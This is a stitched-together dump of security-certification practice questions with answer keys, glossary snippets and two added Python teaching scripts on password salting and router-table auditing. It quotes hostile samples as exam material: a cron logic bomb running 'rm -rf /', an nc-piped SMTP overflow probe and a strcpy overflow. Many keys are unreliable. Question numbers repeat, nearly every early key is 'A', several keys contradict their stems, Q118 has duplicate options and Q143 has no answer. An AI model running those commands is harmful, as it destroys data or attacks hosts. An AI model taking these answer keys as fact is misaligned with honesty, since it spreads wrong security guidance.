QUESTION 13 A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case? A. The certificate has expired B. The browser does not support SSL C. The user's account is locked out D. The VPN software has reached the seat license maximum

Correct Answer: A

QUESTION 145 A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? A. The camera system is infected with a bot. B. The camera system is infected with a RAT. C. The camera system is infected with a Trojan. D. The camera system is infected with a backdoor.

Correct Answer: A

QUESTION 2 Which of the following is the BEST reason for salting a password hash before it is stored in a database? A. To prevent duplicate values from being stored B. To make the password retrieval process very slow C. To protect passwords from being saved in readable format D. To prevent users from using simple passwords for their access credentials

Correct Answer: A

QUESTION 20 Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application? A. Sandboxing B. Encryption C. Code signing D. Fuzzing

Correct Answer: A

QUESTION 21 A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this? A. Configure the OS default TTL to 1 B. Use NAT on the R&D network C. Implement a router ACL D. Enable protected ports on the switch

Correct Answer: A

QUESTION 22 After a security incident, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process? A. Lessons learned B. Recovery C. Identification D. Preparation

Correct Answer: A

QUESTION 25 A technician suspects that a system has been compromised. The technician reviews the following log entries:
WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll
WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll
Based solely on the above information, which of the following types of malware is MOST likely installed on the system? A. Rootkit B. Ransomware C. Trojan D. Backdoor

Correct Answer: A

QUESTION 28 An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST? A. Make a copy of everything in memory on the workstation. B. Turn off the workstation. C. Consult the information security policy. D. Run a virus scan.

Correct Answer: A

QUESTION 29 A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists with a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information? A. Penetration test B. Vulnerability scan C. Active reconnaissance D. Patching assessment report

Correct Answer: A

QUESTION 3 An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation? A. Script kiddie B. Hacktivist C. Cryptologist D. Security auditor

Correct Answer: A

QUESTION 10 A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select TWO) A. The MTTR is faster. B. The MTTR is slower. C. The RTO has increased. D. The RTO has decreased. E. The MTTF has increased. F. The MTTF has decreased.

Correct Answer: AD

QUESTION 37Company A agrees to provide perimeter protection, power, and environmental support with measurable goalsfor Company B, but will not be responsible for user authentication or patching of operating systems within theperimeter. Which of the following is being described?A. Service level agreementB. Memorandum of understandingC. Business partner agreementD. Interoperability agreement

Correct Answer: A

QUESTION 39 After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
Proto  Local Address       Foreign Address  State
TCP    0.0.0.0:135         0.0.0.0          RpcSs [svchost.exe]
TCP    0.0.0.0:445         0.0.0.0          [svchost.exe]
TCP    192.168.1.10:5000   10.37.213.20     winserver.exe
UDP    192.168.1.10:1900   *.*              SSDPSVR
Based on the above information, which of the following types of malware was installed on the user's computer? A. RAT B. Keylogger C. Spyware D. Worm E. Bot

Correct Answer: A

QUESTION 4 An organization wants to utilize a common, Internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide the required services. To which of the following technologies is the provider referring? A. OpenID Connect B. SAML C. XACML D. LDAP

Correct Answer: A

QUESTION 40 An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software? A. Configure a firewall with deep packet inspection that restricts traffic to the systems. B. Configure a separate zone for the systems and restrict access to known ports. C. Configure the systems to ensure only necessary applications are able to run. D. Configure the host firewall to ensure only the necessary applications have listening ports.

Correct Answer: C. Restricting which executables can run (application allowlisting) stops malicious software on hosts that cannot be patched; the network controls in A, B and D reduce exposure but do not block malware that arrives by other paths, such as removable media or a vendor laptop.

QUESTION 43 A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from services inside the same industry. B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. C. Conduct an internal audit against industry best practices to perform a qualitative analysis. D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Correct Answer: A

QUESTION 43 An information security specialist is reviewing the following output from a Linux server:
user@server:~$ crontab -l
5 * * * * /usr/local/bin/backup.sh
user@server:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
if ! grep --quiet joeuser /etc/passwd
then rm -rf /
fi
Based on the above information, which of the following types of malware was installed on the server? A. Logic bomb B. Trojan C. Backdoor D. Ransomware E. Rootkit

Correct Answer: A

QUESTION 44 A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? A. Shredding B. Wiping C. Low-level formatting D. Repartitioning E. Overwriting

Correct Answer: A

QUESTION 44 During a routine vulnerability assessment, the following command was successful:
echo "vrfy `perl -e 'print "hi" x 500'`" | nc www.company.com 25
Which of the following vulnerabilities is being exploited? A. Buffer overflow directed at a specific host MTA B. SQL injection directed at a web server C. Cross-site scripting directed at www.company.com D. Race condition in a UNIX shell script

Correct Answer: A

QUESTION 46 A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations? A. Implement SAML so the company's services may accept assertions from the customers' authentication servers. B. Provide customers with a constrained interface to manage only their users' accounts in the company's active directory server. C. Provide a system for customers to replicate their users' passwords from their authentication service to the company's. D. Use SOAP calls to support authentication between the company's product and the customers' authentication servers.

Correct Answer: A

QUESTION 48 Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed? A. Lessons learned review B. Root cause analysis C. Incident audit D. Corrective action exercise

Correct Answer: A

QUESTION 49 A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform: A. a gray-box penetration test. B. a risk analysis. C. a vulnerability assessment. D. an external security audit. E. a red team exercise.

Correct Answer: A

QUESTION 49 Users from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors? A. Trust model B. Stapling C. Intermediate CA D. Key escrow

Correct Answer: A

FTPS

File Transfer Protocol Secure. An extension of FTP that uses SSL or TLS to encrypt FTP traffic. Some implementations of FTPS use ports 989 and 990.

QUESTION 51 After a recent internal breach, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates? A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data. B. One key pair will be used for encryption. The other key pair will provide extended validation. C. Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength. D. One key pair will be used for internal communication, and the other will be used for external communication.

Correct Answer: A

QUESTION 52 A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report? A. Vulnerability scanner B. Protocol analyzer C. Network mapper D. Web inspector

Correct Answer: A

QUESTION 53 A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection? A. $500 B. $1000 C. $2000 D. $2500

Correct Answer: A. ALE = SLE x ARO. At SLE = $500 the ALE is 5 x $500 = $2,500, equal to the $2,500 annual cost of the control, so the purchase returns nothing; every higher SLE listed gives an ALE above the cost and would justify buying the protection.

QUESTION 53 A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees? A. WPS B. 802.1x C. WPA2-PSK D. TKIP

Correct Answer: A

QUESTION 57 Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host? A. Remote exploit B. Amplification C. Sniffing D. Man-in-the-middle

Correct Answer: A

QUESTION 58 Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation

Correct Answer: A

QUESTION 5 Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Competitor B. Hacktivist C. Insider D. Organized crime

Correct Answer: A

QUESTION 62 An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this? A. Input validation B. Proxy server C. Stress testing D. Encoding

Correct Answer: A

QUESTION 63 While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now? A. Recovery B. Eradication C. Containment D. Identification

Correct Answer: A

QUESTION 64 A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file? A. Keylogger B. Rootkit C. Bot D. RAT

Correct Answer: A

QUESTION 65 A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? A. Identify the source of the active connection B. Perform eradication of active connection and recover C. Perform containment procedure by disconnecting the server D. Format the server and restore its initial configuration

Correct Answer: A

QUESTION 65 Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system? A. Passive scan B. Aggressive scan C. Credentialed scan D. Intrusive scan

Correct Answer: A

QUESTION 66 A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? A. Banner grabbing B. Port scanning C. Packet sniffing D. Virus scanning

Correct Answer: A

QUESTION 66 Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured? A. Embedded web server B. Spooler C. Network interface D. LCD control panel

Correct Answer: A

QUESTION 67 A hacker has a packet capture that contains:
....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2
.....Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2
......John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2..
Which of the following tools will the hacker use against this type of capture? A. Password cracker B. Vulnerability scanner C. DLP scanner D. Fuzzer

Correct Answer: A

QUESTION 68 A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed? A. RAT B. Worm C. Ransomware D. Bot

Correct Answer: A

QUESTION 69 A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? A. Accounting B. Authorization C. Authentication D. Identification

Correct Answer: A

QUESTION 70 A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include:
Remote wipe capabilities
Geolocation services
Patch management and reporting
Mandatory screen locks
Ability to require passcodes and PINs
Ability to require encryption
Which of the following would BEST meet these requirements? A. Implementing MDM software B. Deploying relevant group policies to the devices C. Installing full device encryption D. Removing administrative rights to the devices

Correct Answer: A

FTP

File Transfer Protocol. Used to upload and download files to an FTP server. FTP uses ports 20 and 21. Secure FTP (SFTP) uses SSH for encryption on port 22. FTP Secure (FTPS) uses SSL or TLS for encryption.

QUESTION 71 A technician receives a device with the following anomalies:
Frequent pop-up ads
Slow response time switching between active programs
Unresponsive peripherals
The technician reviews the following log file entries:
File Name       Source MD5                         Target MD5                         Status
antivirus.exe   F794F21CD33E4F57890DDEA5CF267ED2   F794F21CD33E4F57890DDEA5CF267ED2   Automatic
iexplore.exe    7FAAF21CD33E4F57890DDEA5CF29CCEA   AA87F21CD33E4F57890DDEAEE2197333   Automatic
service.exe     77FF390CD33E4F57890DDEA5CF28881F   77FF390CD33E4F57890DDEA5CF28881F   Manual
USB.exe         E289F21CD33E4F57890DDEA5CF28EDC0   E289F21CD33E4F57890DDEA5CF28EDC0   Stopped
Based on the above output, which of the following should be reviewed? A. The web application firewall B. The file integrity check C. The data execution prevention D. The removable media control

Correct Answer: B. The source and target MD5 values for iexplore.exe differ, which is exactly the kind of change a file integrity check reports; the other entries match, and nothing in the output relates to a WAF, DEP or removable media.

QUESTION 73 A technician is investigating a potentially compromised device with the following symptoms:
Browser slowness
Frequent browser crashes
Hourglass stuck
New search toolbar
Increased memory consumption
Which of the following types of malware has infected the system? A. Man-in-the-browser B. Spoofer C. Spyware D. Adware

Correct Answer: A

QUESTION 73 An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication? A. Proximity card, fingerprint scanner, PIN B. Fingerprint scanner, voice recognition, proximity card C. Smart card, user PKI certificate, privileged user certificate D. Voice recognition, smart card, proximity card

Correct Answer: A

QUESTION 8 A web developer improves client access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements? A. SAML B. LDAP C. OAuth D. Shibboleth

Correct Answer: C. OAuth issues an access token that the client presents to the REST API, so the API never sees the user's password; SAML and Shibboleth are browser-oriented SSO assertion systems, and LDAP is a directory protocol, not a tokenized API authorization scheme.

QUESTION 84 A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process? A. Restore lost data from a backup. B. Wipe the system. C. Document the lessons learned. D. Determine the scope of impact.

Correct Answer: D. Isolating the host and killing the process is containment; before eradicating (wiping) and recovering (restoring from backup), the responder establishes how far the compromise spread, otherwise other infected systems are missed and the restored host is reinfected.

QUESTION 8 Which of the following differentiates a collision attack from a rainbow table attack? A. A rainbow table attack performs a hash lookup. B. A rainbow table attack uses the hash as a password. C. In a collision attack, the hash and the input data are equivalent. D. In a collision attack, the same input results in different hashes.

Correct Answer: A
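The three cards above (QUESTION 2 on salting, QUESTION 67 on running a password cracker against captured hashes, and QUESTION 8 on rainbow-table lookups) all turn on the same mechanics. The following is an added example, not part of the original study material: it builds a small precomputed digest-to-plaintext table from a constructed wordlist (a rainbow table is a space-optimized form of the same lookup), cracks an unsalted MD5 with one dictionary lookup, then shows that a per-user salt leaves the same password absent from the table and that two users with the same password get different stored records. The wordlist, the user names and the fixed salts are constructed for the demo; MD5 is used only because the cards use it, and real systems should use a purpose-built password hash such as bcrypt, scrypt or Argon2.

```python
"""Added example: why a salt defeats a precomputed (rainbow/lookup) table."""
import hashlib
import hmac
import os

# Constructed wordlist, standing in for the much larger lists a cracker loads.
WORDLIST = ["123456", "password", "letmein", "Summer2017", "qwerty"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_lookup_table(words):
    """Precompute digest -> plaintext for every candidate. A rainbow table
    stores chains instead of every pair, but the attack is still a lookup."""
    return {md5_hex(w.encode()): w for w in words}


def crack_unsalted(stored_hex, table):
    """One dictionary lookup per captured hash (the QUESTION 67 scenario)."""
    return table.get(stored_hex)


def new_salt() -> bytes:
    """Real code draws a fresh random salt per user; the demo uses fixed ones."""
    return os.urandom(16)


def hash_with_salt(password: str, salt: bytes) -> str:
    """Store the salt next to the digest; it is unique, not secret."""
    return salt.hex() + "$" + md5_hex(salt + password.encode())


def verify_salted(password: str, stored: str) -> bool:
    salt_hex, digest = stored.split("$", 1)
    candidate = md5_hex(bytes.fromhex(salt_hex) + password.encode())
    return hmac.compare_digest(candidate, digest)


def crack_salted(stored, table):
    """The precomputed table was built over plaintexts only, not over every
    (salt, plaintext) pair, so the salted digest is not in it. The attacker
    is forced back to hashing the wordlist once per salt."""
    _, digest = stored.split("$", 1)
    return table.get(digest)


def demo():
    table = build_lookup_table(WORDLIST)
    unsalted = md5_hex(b"password")
    # Fixed salts (constructed) so the demo is reproducible.
    salt_a = bytes.fromhex("a1b2c3d4e5f60718")
    salt_b = bytes.fromhex("0f1e2d3c4b5a6978")
    alice = hash_with_salt("password", salt_a)
    bob = hash_with_salt("password", salt_b)
    return {
        "cracked_unsalted": crack_unsalted(unsalted, table),
        "cracked_salted": crack_salted(alice, table),
        "same_password_same_record": alice == bob,
        "alice_verifies": verify_salted("password", alice),
        "bob_wrong_password": verify_salted("Password", bob),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two salted records differ even though both users chose "password", which is the property option A of QUESTION 2 is pointing at: the database no longer reveals which users share a password, and a single precomputed table cannot be reused across users.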

QUESTION 97 Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred? A. Ransomware B. Keylogger C. Buffer overflow D. Rootkit

Correct Answer: A

QUESTION 9 A security analyst observes the following events in the logs of an employee workstation:
1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level.
1/23 1:07:09 1034 The scan is completed. No detections were found.
The security analyst reviews the file system and observes the following:
C:\>dir C:\Users\user\temp
1/23 1:07:02 oasdfkh.hta
1/23 1:07:02 update.bat
1/23 1:07:02 msg.txt
Given the information provided, which of the following MOST likely occurred on the workstation? A. Application whitelisting controls blocked an exploit payload from executing. B. Antivirus software found and quarantined three malware files. C. Automatic updates were initiated but failed because they had not been approved. D. The SIEM log agent was not tuned properly and reported a false positive.

Correct Answer: A

QUESTION 134 A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network:
Hostname    IP Address     MAC                  Filter
Dad PC      192.168.1.15   00:1D:1A:44:17:B5    On
Mom PC      192.168.1.15   21:13:D6:C5:42:A2    Off
Junior PC   192.168.2.16   42:A7:D1:25:11:52    On
Unknown     192.168.1.18   10:B3:22:1A:FF:21    Off
Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? A. Apply MAC filtering and see if the router drops any of the systems B. Physically check each of the authorized systems to determine if they are logged onto the network C. Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host D. Conduct a ping sweep of each of the authorized systems and see if an echo response is received

Correct Answer: A. Dad PC and Mom PC show the same IP address with different MAC addresses, so one of the two entries is likely a spoofed system; applying MAC filtering shows which host the router drops.
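As an added example for QUESTION 134 (not part of the original study material), the following parses the router's client table and reports the indicators a home user would check before touching the filter: two hosts claiming one IP address, a host outside the expected LAN subnet, hosts not covered by the MAC filter, and duplicate MACs. It then simulates option A by listing which hosts a MAC allow list would drop. The table text, the LAN subnet 192.168.1.0/24 and the allow list are assumptions for the demo.

```python
"""Added example: audit a home router's client table for spoofing indicators."""
import ipaddress
from collections import defaultdict

# Constructed copy of the table from QUESTION 134.
ROUTER_TABLE = """\
Hostname   IP Address    MAC                Filter
Dad PC     192.168.1.15  00:1D:1A:44:17:B5  On
Mom PC     192.168.1.15  21:13:D6:C5:42:A2  Off
Junior PC  192.168.2.16  42:A7:D1:25:11:52  On
Unknown    192.168.1.18  10:B3:22:1A:FF:21  Off
"""


def parse_table(text):
    """Return one dict per client row; hostnames may contain spaces, so the
    last three whitespace-separated fields are taken as IP, MAC and filter."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        parts = line.split()
        if len(parts) < 4:
            continue
        ip, mac, filt = parts[-3], parts[-2], parts[-1]
        rows.append({"host": " ".join(parts[:-3]), "ip": ip,
                     "mac": mac.upper(), "filter": filt.lower() == "on"})
    return rows


def audit(rows, lan="192.168.1.0/24"):
    """Return sorted (indicator, subject) findings for the client table."""
    net = ipaddress.ip_network(lan)
    findings = []
    by_ip, by_mac = defaultdict(list), defaultdict(list)
    for r in rows:
        by_ip[r["ip"]].append(r["host"])
        by_mac[r["mac"]].append(r["host"])
        if ipaddress.ip_address(r["ip"]) not in net:
            findings.append(("OUTSIDE_SUBNET", r["host"]))
        if not r["filter"]:
            findings.append(("MAC_FILTER_OFF", r["host"]))
        if r["host"].lower() == "unknown":
            findings.append(("UNKNOWN_HOST", r["host"]))
    for ip, hosts in by_ip.items():
        if len(hosts) > 1:
            # One IP, two MACs: one of the hosts is likely a spoofed system.
            findings.append(("DUPLICATE_IP", ip))
    for mac, hosts in by_mac.items():
        if len(hosts) > 1:
            findings.append(("DUPLICATE_MAC", mac))
    return sorted(findings)


def simulate_mac_filter(rows, allowed_macs):
    """Option A: with filtering on, hosts whose MAC is not on the allow list
    are dropped. A host that copied an allowed MAC passes, which is why the
    duplicate-IP check above is the stronger signal."""
    allowed = {m.upper() for m in allowed_macs}
    return sorted(r["host"] for r in rows if r["mac"] not in allowed)


if __name__ == "__main__":
    clients = parse_table(ROUTER_TABLE)
    for indicator, subject in audit(clients):
        print(f"{indicator:15} {subject}")
    # Assumed allow list: the two MACs the household knows to be its own.
    print("dropped by filter:", simulate_mac_filter(
        clients, ["00:1D:1A:44:17:B5", "42:A7:D1:25:11:52"]))
```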

QUESTION 131An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement? A. Tunnel mode B. Transport mode C. AH-only mode D. ESP-only mode

Correct Answer: A In both ESP and AH cases with IPSec Transport mode, the IP header is exposed. The IP header is not exposed in IPSec Tunnel mode.

QUESTION 124Users report the following message appears when browsing to the company's secure site: This website can not be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO) A. Verify the certificate has not expired on the server B. Ensure the certificate has a .pfx extension on the server C. Update the root certificate into the client computer certificate store D. Install the updated private key on the webserver E. Have users clear their browsing history and re-launch the session

Correct Answer: AC

QUESTION 3 A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements:
* All access must be correlated to a user account.
* All user accounts must be assigned to a single individual.
* User access to the PHI data must be recorded.
* Anomalies in PHI data access must be reported.
* Logs and records cannot be deleted or modified.
Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews.

Correct Answer: ACE

GPG

GNU Privacy Guard (GPG). Free software that is based on the OpenPGP standard. It is similar to PGP but avoids any conflict with existing licensing by using open standards.

QUESTION 57 A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicates it was pushed from the central patch system.
File: winx86_adobe_upgrade.exe
Hash: 99ac28bede43ab869b853ba62c4ea243
The administrator pulls a report from the patch management system with the following output:
Install Date   Package Name                     Target Device   Hash
10/10/2017     java_11.2_x64.exe                HQ PC's         01ab28bbde63aa879b35bba62cdea282
10/10/2017     winx86_adobe_flash_upgrade.exe   HQ PC's         99ac28bede43ab86b853ba62c4ea243
Given the above output, which of the following MOST likely happened? A. The file was corrupted after it left the patch system B. The file was infected when the patch manager downloaded it C. The file was not approved in the application whitelist system D. The file was embedded with a logic bomb to evade detection

Correct Answer: B

QUESTION 59
A security analyst has received the following alert snippet from the HIDS appliance:
PROTOCOL  SIG        SRC.PORT          DST.PORT
TCP       XMAS SCAN  192.168.1.1:1091  192.168.1.2:8891
TCP       XMAS SCAN  192.168.1.1:649   192.168.1.2:9001
TCP       XMAS SCAN  192.168.1.1:2264  192.168.1.2:6455
TCP       XMAS SCAN  192.168.1.1:3464  192.168.1.2:8744
Given the above logs, which of the following is the cause of the attack?
A. The TCP ports on destination are all open.
B. FIN, URG, and PSH flags are set in the packet header.
C. TCP MSS is configured improperly.
D. There is improper Layer 2 segmentation.

Correct Answer: B

QUESTION 60
A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack?
A. The DLL of each application should be set individually
B. All calls to different DLLs should be hard-coded in the application
C. Access to DLLs from the Windows registry should be disabled
D. The affected DLLs should be renamed to avoid future hijacking

Correct Answer: B

QUESTION 62
After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this determination?
A. tracert
B. Fuzzer
C. nslookup
D. Nmap
E. netcat

Correct Answer: B

QUESTION 67
An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code:

#include <string.h>

void foo(char *bar)
{
    char random_user_input[12];
    /* copies bar without any length check into a 12-byte stack buffer */
    strcpy(random_user_input, bar);
}

Which of the following vulnerabilities is present?
A. Bad memory pointer
B. Buffer overflow
C. Integer overflow
D. Backdoor

Correct Answer: B

QUESTION 7
Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time?
A. Security awareness training
B. Antivirus
C. Firewalls
D. Intrusion detection system

Correct Answer: B

QUESTION 78
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details:
Certificate 1
Certificate Path: Geotrust Global CA
*company.com
Certificate 2
Certificate Path:
*company.com
Which of the following would resolve the problem?
A. Use a wildcard certificate.
B. Use certificate chaining.
C. Use a trust model.
D. Use an extended validation certificate.

Correct Answer: B

QUESTION 79
Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions' infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources?
A. Attestation
B. Federation
C. Single sign-on
D. Kerberos

Correct Answer: B

QUESTION 82
An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?
A. Transitive trust
B. Single sign-on
C. Federation
D. Secure token

Correct Answer: B

QUESTION 83
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?
A. Replay
B. Spoofing
C. DNS poisoning
D. Client-side attack

Correct Answer: B

QUESTION 88
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?
A. Staging environment
B. Sandboxing
C. Secure baseline
D. Trusted OS

Correct Answer: B

QUESTION 91
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?
A. Black box
B. Gray box
C. Credentialed
D. White box

Correct Answer: B

QUESTION 92
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?
A. Competitors
B. Insiders
C. Hacktivists
D. Script kiddies

Correct Answer: B

QUESTION 93
While troubleshooting a client application connecting to the network, the security administrator notices the following error: "Certificate is not valid." Which of the following is the BEST way to check if the digital certificate is valid?
A. PKI
B. CRL
C. CSR
D. IPSec

Correct Answer: B

QUESTION 98
Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement?
A. Role-based access control
B. Honeypot
C. Rule-based access control
D. Password cracker

Correct Answer: B

QUESTION 99
Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file?
A. Unencrypted credentials
B. Authentication issues
C. Weak cipher suite
D. Permission issues

Correct Answer: B

You must authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be most appropriate to achieve this objective?
a. WPA
b. WPA2 PSK
c. WPA2-CCMP
d. WPS

Correct Answer: B

QUESTION 118
Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization?
A. The server should connect to external Stratum 0 NTP servers for synchronization
B. The server should connect to internal Stratum 0 NTP servers for synchronization
C. The server should connect to external Stratum 1 NTP servers for synchronization
D. The server should connect to external Stratum 1 NTP servers for synchronization

Correct Answer: B
Configure your own internal NTP hierarchical service for your network. It is possible to purchase Stratum 1 or Stratum 0 NTP appliances to use internally for less than the cost of a typical server. It is also possible to set up a private NTP server at a very low cost. The feasibility of setting up a commercial off the shelf (COTS) NTP server is evidenced in a recent effort to configure a Raspberry Pi computer as a Stratum-1 server. If you do decide to configure your own, please consider the following best practices:
Standardize to UTC time. Within an enterprise, standardize all systems to coordinated universal time (UTC). Standardizing to UTC simplifies log correlation within the organization and with external parties no matter what time zone the device being synchronized is located in.
Secure the network time service. Restrict the commands that can be used on the stratum servers. Do not allow public queries of the stratum servers. Only allow known networks/hosts to communicate with their respective stratum servers.
Consider the business need for cryptography. Many administrators try to secure their networks with encrypted communications and encrypted authentication. I would introduce a note of caution here because although there are cryptographic services associated with NTP for securing NTP communications, the use of encryption introduces more sources for problems, such as requiring key management, and it also requires a higher computational overhead.
Remember Segal's Law. Ideally, it would work to have three or more Stratum 0 or Stratum 1 servers and use those servers as primary masters. Remember Segal's Law: having two NTP servers makes it hard to know which one is accurate. Two Stratum 0 servers would provide a more accurate timestamp because they are using a time source that is considered definitive.

QUESTION 143
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?
A. Aggressive scan
B. Passive scan
C. Non-credentialed scan
D. Compliance scan

